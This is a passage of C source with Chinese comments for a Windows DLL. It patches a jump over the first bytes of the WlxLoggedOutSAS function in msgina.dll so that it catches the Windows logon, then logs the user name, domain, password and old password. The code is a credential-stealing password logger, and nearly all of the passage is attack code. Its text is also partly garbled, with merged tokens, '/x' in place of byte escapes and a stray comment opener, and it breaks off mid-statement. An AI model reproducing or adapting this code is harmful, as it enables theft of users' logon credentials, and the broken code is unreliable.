ol isWin2K()//判断操作系统版本 { DWORD winVer; OSVERSIONINFO *osvi; winVer=GetVersion(); if(winVer<0x80000000) { osvi= (OSVERSIONINFO *)malloc(sizeof(OSVERSIONINFO)); if (osvi!=NULL) { memset(osvi,0,sizeof(OSVERSIONINFO)); osvi->dwOSVersionInfoSize=sizeof(OSVERSIONINFO); GetVersionEx(osvi); if(osvi->dwMajorVersion==5L&&osvi->dwMinorVersion==0L) { free(osvi); return true; } } } free(osvi); return false; } #pragma pack(1)//对齐字节 struct HookTable{ HMODULEhMsgina; WlxLoggedOutSAS OldDDR; WlxLoggedOutSAS NewADDR; unsigned charOldCode[6]; unsigned charJmpCode[6]; };//自定义的结构体 HookTable hooktable = { 0 , 0 , &FunNewADDR , "/x8B/xFF/x55/x8B/xEC", //前5个字节 "/xE9/x00/x00/x00/x00" //e9 ,jmp }; /* #pragma pack() BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { if(isWin2K()) //win2K和xp、2003的前五个字节不同 { hooktable.OldCode[0] ='/x55'; hooktable.OldCode[1] ='/x8B'; hooktable.OldCode[2] ='/xEC'; hooktable.OldCode[3] ='/x83'; hooktable.OldCode[4] ='/xEC'; } switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: HANDLE hthread = CreateThread( 0 , 0 , LPTHREAD_START_ROUTINE(StartHook) , 0 , 0 , 0); CloseHandle( hthread ); break; } return TRUE; } DWORD WINAPI StartHook(LPVOID lpParameter) { hooktable.hMsgina = GetModuleHandle( _T("msgina.dll")); if ( hooktable.hMsgina == NULL) { return 0 ; } hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress( hooktable.hMsgina , _T("WlxLoggedOutSAS") ); //得到原始函数地址,等下撤销HOOK会用到 if (hooktable.OldDDR == NULL) { return 0 ; } unsigned char *p = (unsigned char *)hooktable.OldDDR; int *OpCode = (int *)&hooktable.JmpCode[1];// int Code = (int)hooktable.NewADDR - (int)hooktable.OldDDR - 5; *OpCode = Code; HookWlxLoggedOutSAS(); return 0; } void HookWlxLoggedOutSAS() { DWORD OldProtect = NULL; VirtualProtect( hooktable.OldDDR , 5 , PAGE_EXECUTE_READWRITE , &OldProtect );//内存访问权限 unsigned char *p = (unsigned char *)hooktable.OldDDR; for (int i=0 ; i < 5 ; i++ ) { p[i] = hooktable.JmpCode[i]; } VirtualProtect( hooktable.OldDDR , 5 , OldProtect , &OldProtect ); return; } void UnHookWlxLoggedOutSAS() { DWORD OldProtect = NULL; VirtualProtect( hooktable.OldDDR , 5 , PAGE_EXECUTE_READWRITE , &OldProtect ); unsigned char *p = (unsigned char *)hooktable.OldDDR; for (int i=0 ; i < 5 ; i++ ) { p[i] = hooktable.OldCode[i]; } VirtualProtect( hooktable.OldDDR , 5 , OldProtect , &OldProtect ); return; } char pBuffer[1124]; void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo) //主要是一些文件操作 { int size_u = lstrlenW( pNprNotifyInfo->pszUserName ); size_u += lstrlenW( pNprNotifyInfo->pszDomain ); size_u += lstrlenW( pNprNotifyInfo->pszPassword ); size_u += lstrlenW( pNprNotifyInfo->pszOldPassword ); unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 ); unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 ); char pBuffer1[1124]; char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 ); char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 ); ZeroMemory( pWBuffer , size_u + 1024 ); ZeroMemory( pBuffer , size_u + 1024 ); ZeroMemory( pBuffer1 , size_u + 1024 ); if ( !pBuffer ) { return; }else { WriteCurrentTime(); wsprintfW( pWBuffer , L"/r/nUser= %s /r/nDomain = %s |